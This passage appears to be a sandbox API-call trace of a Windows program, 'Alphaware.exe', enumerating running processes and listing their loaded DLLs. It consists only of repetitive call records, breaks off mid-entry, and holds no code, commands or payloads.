[0055.150] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0055.151] CoTaskMemFree (pv=0x780780) [0055.151] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.151] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0055.151] CoTaskMemFree (pv=0x780780) [0055.151] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x24f00d0, cb=0x18 | out: lpmodinfo=0x24f00d0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0055.152] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.152] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0055.152] CoTaskMemFree (pv=0x780780) [0055.152] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.152] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0055.153] CoTaskMemFree (pv=0x780780) [0055.153] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x24f22a0, cb=0x18 | out: lpmodinfo=0x24f22a0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0055.153] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.153] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0055.154] CoTaskMemFree (pv=0x780780) [0055.154] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.154] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0055.155] CoTaskMemFree (pv=0x780780) [0055.155] CloseHandle (hObject=0x21c) returned 1 [0055.156] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0055.156] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x21c [0055.156] EnumProcessModules (in: hProcess=0x21c, lphModule=0x24f49b0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24f49b0, lpcbNeeded=0x41eb20) returned 1 [0055.157] GetModuleInformation (in: hProcess=0x21c, hModule=0x160000, lpmodinfo=0x24f4c38, cb=0x18 | out: lpmodinfo=0x24f4c38*(lpBaseOfDll=0x160000, SizeOfImage=0x17000, EntryPoint=0x1614a1)) returned 1 [0055.157] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.157] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x160000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="white_fine_pm.exe") returned 0x11 [0055.158] CoTaskMemFree (pv=0x780780) [0055.158] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.158] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x160000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Firefox\\white_fine_pm.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\white_fine_pm.exe")) returned 0x38 [0055.158] CoTaskMemFree (pv=0x780780) [0055.158] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x24f6e78, cb=0x18 | out: lpmodinfo=0x24f6e78*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.158] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.158] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.159] CoTaskMemFree (pv=0x780780) [0055.159] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.159] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.160] CoTaskMemFree (pv=0x780780) [0055.160] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x24f9038, cb=0x18 | out: lpmodinfo=0x24f9038*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0055.160] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.160] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0055.161] CoTaskMemFree (pv=0x780780) [0055.161] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.161] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0055.161] CoTaskMemFree (pv=0x780780) [0055.161] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x24fb1f8, cb=0x18 | out: lpmodinfo=0x24fb1f8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0055.162] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.162] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0055.162] CoTaskMemFree (pv=0x780780) [0055.162] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.162] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0055.163] CoTaskMemFree (pv=0x780780) [0055.163] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x24fd3c8, cb=0x18 | out: lpmodinfo=0x24fd3c8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0055.163] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.163] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0055.164] CoTaskMemFree (pv=0x780780) [0055.164] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.164] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0055.165] CoTaskMemFree (pv=0x780780) [0055.165] CloseHandle (hObject=0x21c) returned 1 [0055.165] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c) returned 0x21c [0055.165] EnumProcessModules (in: hProcess=0x21c, lphModule=0x24ffad8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24ffad8, lpcbNeeded=0x41eb20) returned 1 [0055.166] GetModuleInformation (in: hProcess=0x21c, hModule=0x340000, lpmodinfo=0x24ffd48, cb=0x18 | out: lpmodinfo=0x24ffd48*(lpBaseOfDll=0x340000, SizeOfImage=0x17000, EntryPoint=0x3414a1)) returned 1 [0055.166] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.166] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x340000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0055.166] CoTaskMemFree (pv=0x780780) [0055.166] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.166] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x340000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Reference Assemblies\\centralcreditcard.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\centralcreditcard.exe")) returned 0x41 [0055.166] CoTaskMemFree (pv=0x780780) [0055.166] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x2501fa0, cb=0x18 | out: lpmodinfo=0x2501fa0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.167] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.167] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.167] CoTaskMemFree (pv=0x780780) [0055.167] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.167] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.167] CoTaskMemFree (pv=0x780780) [0055.167] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x2504160, cb=0x18 | out: lpmodinfo=0x2504160*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0055.168] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.168] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0055.168] CoTaskMemFree (pv=0x780780) [0055.168] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.168] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0055.169] CoTaskMemFree (pv=0x780780) [0055.169] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x2506320, cb=0x18 | out: lpmodinfo=0x2506320*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0055.169] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0055.169] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0055.169] CoTaskMemFree (pv=0x780780) [0055.169] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0055.170] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x25084f0, cb=0x18 | out: lpmodinfo=0x25084f0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0055.170] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0055.171] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0055.171] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3fc) returned 0x21c [0055.171] EnumProcessModules (in: hProcess=0x21c, lphModule=0x250ac18, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x250ac18, lpcbNeeded=0x41eb20) returned 1 [0055.174] GetModuleInformation (in: hProcess=0x21c, hModule=0xff760000, lpmodinfo=0x250ae88, cb=0x18 | out: lpmodinfo=0x250ae88*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0055.175] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0055.175] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0055.175] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x250d080, cb=0x18 | out: lpmodinfo=0x250d080*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.175] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.176] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.176] GetModuleInformation (in: hProcess=0x21c, hModule=0x77710000, lpmodinfo=0x250f240, cb=0x18 | out: lpmodinfo=0x250f240*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0055.176] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0055.177] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0055.177] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd910000, lpmodinfo=0x2511410, cb=0x18 | out: lpmodinfo=0x2511410*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0055.177] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd910000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0055.178] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd910000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0055.178] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff100000, lpmodinfo=0x25135e0, cb=0x18 | out: lpmodinfo=0x25135e0*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0055.179] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0055.179] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0055.180] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefee80000, lpmodinfo=0x25157f8, cb=0x18 | out: lpmodinfo=0x25157f8*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0055.180] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefee80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0055.181] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefee80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0055.181] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdb50000, lpmodinfo=0x25179b8, cb=0x18 | out: lpmodinfo=0x25179b8*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0055.182] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0055.182] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0055.183] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff760000, lpmodinfo=0x2519b78, cb=0x18 | out: lpmodinfo=0x2519b78*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0055.183] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0055.184] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0055.184] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff1c0000, lpmodinfo=0x251bd38, cb=0x18 | out: lpmodinfo=0x251bd38*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0055.185] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0055.186] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0055.186] GetModuleInformation (in: hProcess=0x21c, hModule=0x77610000, lpmodinfo=0x251df90, cb=0x18 | out: lpmodinfo=0x251df90*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0055.187] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0055.188] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0055.188] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff350000, lpmodinfo=0x2520150, cb=0x18 | out: lpmodinfo=0x2520150*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0055.189] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0055.190] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0055.191] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff690000, lpmodinfo=0x2522300, cb=0x18 | out: lpmodinfo=0x2522300*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0055.191] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff690000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0055.192] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff690000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0055.193] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff400000, lpmodinfo=0x25244c0, cb=0x18 | out: lpmodinfo=0x25244c0*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0055.194] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff400000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0055.195] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff400000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0055.196] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9d0000, lpmodinfo=0x2526680, cb=0x18 | out: lpmodinfo=0x2526680*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0055.196] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0055.197] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0055.198] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd670000, lpmodinfo=0x2528840, cb=0x18 | out: lpmodinfo=0x2528840*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0055.199] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd670000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0055.200] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd670000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0055.201] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff430000, lpmodinfo=0x252aa10, cb=0x18 | out: lpmodinfo=0x252aa10*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0055.202] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff430000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0055.203] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff430000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0055.204] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb2a0000, lpmodinfo=0x252cbe0, cb=0x18 | out: lpmodinfo=0x252cbe0*(lpBaseOfDll=0x7fefb2a0000, SizeOfImage=0x67000, EntryPoint=0x7fefb2b6060)) returned 1 [0055.205] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb2a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="es.dll") returned 0x6 [0055.206] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb2a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")) returned 0x1a [0055.207] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdf90000, lpmodinfo=0x252eec0, cb=0x18 | out: lpmodinfo=0x252eec0*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0055.208] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdf90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0055.209] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdf90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0055.210] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd070000, lpmodinfo=0x2531090, cb=0x18 | out: lpmodinfo=0x2531090*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0055.211] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd070000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0055.213] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd070000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0055.214] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcd70000, lpmodinfo=0x2533250, cb=0x18 | out: lpmodinfo=0x2533250*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0055.215] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0055.216] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0055.217] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd760000, lpmodinfo=0x2535410, cb=0x18 | out: lpmodinfo=0x2535410*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0055.218] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0055.220] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0055.221] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff360000, lpmodinfo=0x25375e0, cb=0x18 | out: lpmodinfo=0x25375e0*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0055.222] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff360000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0055.224] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff360000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0055.225] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefad80000, lpmodinfo=0x25397a0, cb=0x18 | out: lpmodinfo=0x25397a0*(lpBaseOfDll=0x7fefad80000, SizeOfImage=0xa000, EntryPoint=0x7fefad847b8)) returned 1 [0055.226] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefad80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="nsisvc.dll") returned 0xa [0055.228] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefad80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll")) returned 0x1e [0055.229] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9c0000, lpmodinfo=0x253b960, cb=0x18 | out: lpmodinfo=0x253b960*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0055.231] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0055.232] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0055.233] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd680000, lpmodinfo=0x253db10, cb=0x18 | out: lpmodinfo=0x253db10*(lpBaseOfDll=0x7fefd680000, SizeOfImage=0x91000, EntryPoint=0x7fefd681440)) returned 1 [0055.235] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd680000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SXS.DLL") returned 0x7 [0055.236] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd680000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SXS.DLL" 